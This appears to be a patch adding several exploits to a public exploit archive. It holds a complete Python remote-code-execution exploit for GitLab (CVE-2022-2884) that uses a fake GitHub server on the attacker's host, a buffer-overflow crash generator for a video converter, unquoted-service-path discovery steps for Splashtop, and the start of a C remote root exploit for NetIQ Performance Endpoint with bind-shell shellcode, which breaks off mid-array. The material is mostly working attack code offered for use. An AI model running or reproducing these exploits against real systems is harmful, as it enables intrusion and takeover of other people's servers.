# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.
# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3,
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution
# via the Import from GitHub API endpoint.
# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/
# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.
import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys
from flask import Flask, current_app, request
from multiprocessing import Process
VERSION = "v1.0 (2022-12-25)"
DEFAULT_LOGGING_LEVEL = logging.INFO
app = Flask(__name__)
def parse_arguments():
parser = argparse.ArgumentParser(
description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
)
parser.add_argument("-u", "--url",
required=True,
help="URL of the victim GitLab")
parser.add_argument("-pt", "--private-token",
required=True,
help="private token of GitLab")
parser.add_argument("-tn", "--target-namespace",
required=False,
default="root",
help="target namespace of GitLab (default is 'root')")
parser.add_argument("-a", "--address",
required=True,
help="IP address of the attacker machine")
parser.add_argument("-p", "--port",
required=False,
type=int,
default=1337,
help="TCP port of the attacker machine (default is 1337)")
parser.add_argument("-s", "--https",
action="store_true",
required=False,
default=False,
help="set if the attacker machine is exposed via HTTPS")
parser.add_argument("-c", "--command",
required=True,
help="the command to execute")
parser.add_argument("-d", "--delay",
type=float,
required=False,
help="seconds of delay to wait for the exploit to complete")
parser.add_argument("-v", "--verbose",
action="store_true",
required=False,
default=False,
help="verbose mode")
return parser.parse_args()
def validate_input(args):
try:
validators.url(args.url)
except validators.ValidationFailure:
raise ValueError("Invalid target URL!")
if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):
raise ValueError("Invalid GitLab private token!")
if len(args.target_namespace.strip()) < 1:
raise ValueError("Invalid GitLab target namespace!")
try:
validators.ipv4(args.address)
except validators.ValidationFailure:
raise ValueError("Invalid attacker IP address!")
if args.port < 1 or args.port > 65535:
raise ValueError("Invalid attacker TCP port!")
if len(args.command.strip()) < 1:
raise ValueError("Invalid command!")
if args.delay is not None and args.delay <= 0.0:
raise ValueError("Invalid delay!")
def generate_random_string(length):
letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
return ''.join(random.choice(letters) for i in range(length))
def generate_random_lowercase_string(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def generate_random_number(length):
letters = string.digits
result = "0"
while result.startswith("0"):
result = ''.join(random.choice(letters) for i in range(length))
return result
def base64encode(to_encode):
return base64.b64encode(to_encode.encode("ascii")).decode("ascii")
def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
logging.info("Sending request to target GitLab.")
protocol = "http"
if is_https:
protocol += "s"
headers = {
"Content-Type": "application/json",
"PRIVATE-TOKEN": private_token,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
}
fake_personal_access_token = "ghp_" + generate_random_string(36)
new_name = generate_random_lowercase_string(8)
logging.debug("Random generated parameters of the request:")
logging.debug(f" fake_repo_id = {fake_repo_id}")
logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
logging.debug(f" new_name = {new_name}")
payload = {
"personal_access_token": fake_personal_access_token,
"repo_id": fake_repo_id,
"target_namespace": target_namespace,
"new_name": new_name,
"github_hostname": f"{protocol}://{address}:{port}"
}
target_endpoint = f"{url}"
if not target_endpoint.endswith("/"):
target_endpoint = f"{target_endpoint}/"
target_endpoint = f"{target_endpoint}api/v4/import/github"
try:
r = requests.post(target_endpoint, headers=headers, json=payload)
logging.debug("Response:")
logging.debug(f"status_code = {r.status_code}")
logging.debug(f" text = {r.text}")
logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
if r.status_code != 201:
logging.fatal("Wrong response received from the target GitLab.")
logging.debug(f" text = {r.text}")
raise Exception("Wrong response received from the target GitLab.")
except:
logging.fatal("Error in contacting the target GitLab.")
raise Exception("Error in contacting the target GitLab.")
def is_server_alive(address, port, is_https):
protocol = "http"
if is_https:
protocol += "s"
try:
r = requests.get(f"{protocol}://{address}:{port}/")
if r.status_code == 200 and "The server is running." in r.text:
return True
else:
return False
except:
return False
def start_fake_github_server(address, port, is_https, command, fake_repo_id):
app.config["address"] = address
app.config["port"] = port
protocol = "http"
if is_https:
protocol += "s"
app.config["attacker_server"] = f"{protocol}://{address}:{port}"
app.config["command"] = command
app.config["fake_user"] = generate_random_lowercase_string(8)
app.config["fake_user_id"] = generate_random_number(8)
app.config["fake_repo"] = generate_random_lowercase_string(8)
app.config["fake_repo_id"] = fake_repo_id
app.config["fake_issue_id"] = generate_random_number(9)
app.run("0.0.0.0", port)
def encode_command(command):
encoded_command = ""
for c in command:
encoded_command += ("<< " + str(ord(c)) + ".chr ")
encoded_command += "<<"
logging.debug(f"encoded_command = {encoded_command}")
return encoded_command
def generate_rce_payload(command):
logging.debug("Crafting RCE payload:")
logging.debug(f" command = {command}")
encoded_command = encode_command(command) # Useful in order to prevent escaping hell...
rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
logging.debug(f" rce_payload = {rce_payload}")
return rce_payload
def generate_user_response(attacker_server, fake_user, fake_user_id):
response = {
"avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
"events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}",
"followers_url": f"{attacker_server}/users/{fake_user}/followers",
"following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}",
"gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}",
"gravatar_id": "",
"html_url": f"{attacker_server}/{fake_user}",
"id": int(fake_user_id),
"login": f"{fake_user}",
"node_id": base64encode(f"04:User{fake_user_id}"),
"organizations_url": f"{attacker_server}/users/{fake_user}/orgs",
"received_events_url": f"{attacker_server}/users/{fake_user}/received_events",
"repos_url": f"{attacker_server}/users/{fake_user}/repos",
"site_admin": False,
"starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}",
"subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions",
"type": "User",
"url": f"{attacker_server}/users/{fake_user}"
}
return response
def generate_user_full_response(attacker_server, fake_user, fake_user_id):
partial = generate_user_response(attacker_server, fake_user, fake_user_id)
others = {
"bio": None,
"blog": "",
"company": None,
"created_at": "2020-08-21T14:35:46Z",
"email": None,
"followers": 2,
"following": 0,
"hireable": None,
"location": None,
"name": None,
"public_gists": 0,
"public_repos": 0,
"twitter_username": None,
"updated_at": "2022-08-08T12:11:40Z",
}
response = {**partial, **others}
return response
def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
response = {
"allow_auto_merge": False,
"allow_forking": True,
"allow_merge_commit": True,
"allow_rebase_merge": True,
"allow_squash_merge": True,
"allow_update_branch": False,
"archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}",
"archived": False,
"assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}",
"blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}",
"branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}",
"clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git",
"collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}",
"comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}",
"commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}",
"compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}",
"contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}",
"contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors",
"created_at": "2021-04-09T13:55:55Z",
"default_branch": "main",
"delete_branch_on_merge": False,
"deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments",
"description": None,
"disabled": False,
"downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads",
"events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events",
"fork": False,
"forks": 1,
"forks_count": 1,
"forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks",
"full_name": f"{fake_user}/{fake_repo}",
"git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}",
"git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}",
"git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}",
"git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
"has_downloads": True,
"has_issues": True,
"has_pages": False,
"has_projects": True,
"has_wiki": True,
"homepage": None,
"hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks",
"html_url": f"{attacker_server}/{fake_user}/{fake_repo}",
"id": int(repo_id),
"is_template": False,
"issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}",
"issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}",
"issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}",
"keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}",
"labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}",
"language": "Python",
"languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages",
"license": None,
"merge_commit_message": "Message",
"merge_commit_title": "Title",
"merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges",
"milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}",
"mirror_url": None,
"name": f"{fake_repo}",
"network_count": 1,
"node_id": base64encode(f"010:Repository{repo_id}"),
"notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}",
"open_issues": 4,
"open_issues_count": 4,
"owner": generate_user_response(attacker_server, fake_user, fake_user_id),
"permissions": {
"admin": True,
"maintain": True,
"pull": True,
"push": True,
"triage": True
},
"private": True,
"pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}",
"pushed_at": "2022-08-14T15:36:21Z",
"releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}",
"size": 3802,
"squash_merge_commit_message": "Message",
"squash_merge_commit_title": "Title",
"ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
"stargazers_count": 0,
"stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers",
"statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}",
"subscribers_count": 1,
"subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers",
"subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription",
"svn_url": f"{attacker_server}/{fake_user}/{fake_repo}",
"tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags",
"teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams",
"temp_clone_token": generate_random_string(32),
"topics": [],
"trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}",
"updated_at": "2022-06-10T15:12:53Z",
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}",
"use_squash_pr_title_as_default": False,
"visibility": "private",
"watchers": 0,
"watchers_count": 0,
"web_commit_signoff_required": False
}
return response
def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
rce_payload = generate_rce_payload(command)
response = [
{
"active_lock_reason": None,
"assignee": None,
"assignees": [],
"author_association": "OWNER",
"body": "hn-issue description",
"closed_at": None,
"comments": 1,
"comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments",
"created_at": "2021-07-23T13:16:55Z",
"events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events",
"html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
"id": int(fake_issue_id),
"labels": [],
"labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}",
"locked": False,
"milestone": None,
"node_id": base64encode(f"05:Issue{fake_issue_id}"),
"_number": 1,
"number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }},
"performed_via_github_app": None,
"reactions": {
"+1": 0,
"-1": 0,
"confused": 0,
"eyes": 0,
"heart": 0,
"hooray": 0,
"laugh": 0,
"rocket": 0,
"total_count": 0,
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions"
},
"repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test",
"state": "open",
"state_reason": None,
"timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline",
"title": f"{fake_repo}",
"updated_at": "2022-08-14T15:37:08Z",
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3",
"user": generate_user_response(attacker_server, fake_user, fake_user_id)
}
]
return response
@app.before_request
def received_request():
logging.debug(f"Received request:")
logging.debug(f" url = {request.url}")
logging.debug(f"headers = {request.headers}")
@app.after_request
def add_headers(response):
response.headers["content-type"] = "application/json; charset=utf-8"
response.headers["x-ratelimit-limit"] = "5000"
response.headers["x-ratelimit-remaining"] = "4991"
response.headers["x-ratelimit-reset"] = "1660136749"
response.headers["x-ratelimit-used"] = "9"
response.headers["x-ratelimit-resource"] = "core"
return response
@app.route("/")
def index():
return "The server is running."
@app.route("/api/v3/rate_limit")
def api_rate_limit():
response = {
"resources": {
"core": {
"limit": 5000,
"used": 9,
"remaining": 4991,
"reset": 1660136749
},
"search": {
"limit": 30,
"used": 0,
"remaining": 30,
"reset": 1660133589
},
"graphql": {
"limit": 5000,
"used": 0,
"remaining": 5000,
"reset": 1660137129
},
"integration_manifest": {
"limit": 5000,
"used": 0,
"remaining": 5000,
"reset": 1660137129
},
"source_import": {
"limit": 100,
"used": 0,
"remaining": 100,
"reset": 1660133589
},
"code_scanning_upload": {
"limit": 1000,
"used": 0,
"remaining": 1000,
"reset": 1660137129
},
"actions_runner_registration": {
"limit": 10000,
"used": 0,
"remaining": 10000,
"reset": 1660137129
},
"scim": {
"limit": 15000,
"used": 0,
"remaining": 15000,
"reset": 1660137129
},
"dependency_snapshots": {
"limit": 100,
"used": 0,
"remaining": 100,
"reset": 1660133589
}
},
"rate": {
"limit": 5000,
"used": 9,
"remaining": 4991,
"reset": 1660136749
}
}
return response
@app.route("/api/v3/repositories/<repo_id>")
@app.route("/repositories/<repo_id>")
def api_repositories_repo_id(repo_id: int):
address = current_app.config["address"]
port = current_app.config["port"]
attacker_server = current_app.config["attacker_server"]
fake_user = current_app.config["fake_user"]
fake_user_id = current_app.config["fake_user_id"]
fake_repo = current_app.config["fake_repo"]
response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id)
return response
@app.route("/api/v3/repos/<user>/<repo>")
def api_repositories_repo_user_repo(user: string, repo: string):
address = current_app.config["address"]
port = current_app.config["port"]
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
fake_repo_id = current_app.config["fake_repo_id"]
response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id)
return response
@app.route("/api/v3/repos/<user>/<repo>/issues")
def api_repositories_repo_user_repo_issues(user: string, repo: string):
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
fake_issue_id = current_app.config["fake_issue_id"]
command = current_app.config["command"]
response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command)
return response
@app.route("/api/v3/users/<user>")
def api_users_user(user: string):
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
response = generate_user_full_response(attacker_server, user, fake_user_id)
return response
@app.route("/<user>/<repo>.git/HEAD")
@app.route("/<user>/<repo>.git/info/refs")
@app.route("/<user>/<repo>.wiki.git/HEAD")
@app.route("/<user>/<repo>.wiki.git/info/refs")
def empty_response(user: string, repo: string):
logging.debug("Empty string response.")
return ""
# All the others/non-existing routes.
@app.route('/<path:path>')
def catch_all(path):
logging.debug("Empty JSON array response.")
return []
def main():
args = parse_arguments()
logging_level = DEFAULT_LOGGING_LEVEL
if args.verbose:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
validate_input(args)
url = args.url.strip()
private_token = args.private_token.strip()
target_namespace = args.target_namespace.strip()
address = args.address.strip()
port = args.port
is_https = args.https
command = args.command.strip()
delay = args.delay
logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}")
logging.debug("Parameters:")
logging.debug(f" url = {url}")
logging.debug(f" private_token = {private_token}")
logging.debug(f"target_namespace = {target_namespace}")
logging.debug(f" address = {address}")
logging.debug(f" port = {port}")
logging.debug(f" is_https = {is_https}")
logging.debug(f" command = {command}")
logging.debug(f" delay = {delay}")
fake_repo_id = generate_random_number(9)
fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id))
fake_github_server.start()
logging.info("Waiting for the fake GitHub server to start.")
while not is_server_alive(address, port, is_https):
time.sleep(1)
logging.debug("Waiting for the fake GitHub server to start.")
logging.info("Fake GitHub server is running.")
try:
send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id)
except:
logging.critical("Aborting the script.")
fake_github_server.kill()
sys.exit(1)
if delay is not None:
logging.info(f"Waiting for {delay} seconds to let attack finish.")
time.sleep(delay)
else:
logging.info("Press Enter when the attack is finished.")
input()
logging.debug("Stopping the fake GitHub server.")
fake_github_server.kill()
logging.info("Closing the script.")
if __name__ == "__main__":
main()

60
exploits/windows/dos/51196.txt Normal file
View file

@ -0,0 +1,60 @@
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:
## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```Python
#!/usr/bin/python
# nu11secur1ty
print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000
try:
f=open("PoC.txt","w")
print("[+] Creating %s bytes exploit payload.." %len(buffer))
f.write(buffer)
f.close()
print("[+] The PoC file was created!")
except:
print("File cannot be created")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)
## Proof and Exploit:
[href](https://streamable.com/v1hvbf)
## Time spent
`00:35:00`
## Writing an exploit
`00:15:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

28
exploits/windows/local/51182.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Date: 12/20/2022
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
Auto
C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SSUService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Splashtop Software Updater Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

801
exploits/windows/local/51199.c Normal file
View file

@ -0,0 +1,801 @@
/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define IPV4_BUFLEN 16 /* "255.255.255.255\0" */
#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388
static char ppkt_buf1[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00" /* */
"\x00\x02" /* len < 0x80 */
"\x00\x03" /* len < 0x40 */
"\x00" /* len < 0x40 */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x41\x41\x41\x41\x41\x41" /* */
"\x00\x00\x00\x01" /* */
"\x00\x00\x00\x02" /* 218h */
"\x00" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x00" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf1_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 210h */
"\x00\x00\x00\x69" /* var_C */
"\x00\x02" /* */
"\x00\x00\x00\x69" /* var_C */
"\x00\x00\x00\x69" /* 218h */
"\x69" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x69" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 0A8h */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char cpkt_buf1[] =
"\x07"
"AAAA";
static char cpkt_buf2[] =
"\x38"
"\x00\x04"
"AAAA";
static char x86_evil_len[] =
"\x11\xc0"; /* adc eax, eax */
#define X86_NOP_BYTE 0x90 /* nop */
static char sparc_evil_len[] =
"\x10\x80\x00\x3c"; /* ba */
static char sparc_nop[] =
"\x01\x00\x00\x00"; /* nop */
static char hammer_buf[] =
"\x00\x25\x38"
"\x00\x20"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
static char win32_x86_bind[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
"\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
"\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
"\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
"\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
"\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
"\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
"\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
"\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
"\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
"\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
"\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
"\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
"\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
"\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
"\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
"\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
"\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
"\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
"\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
"\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
"\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";
static char freebsd_x86_bind[] =
"\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42"
"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";
static char solaris_sparc_bind[] =
"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b"
"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08"
"\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0"
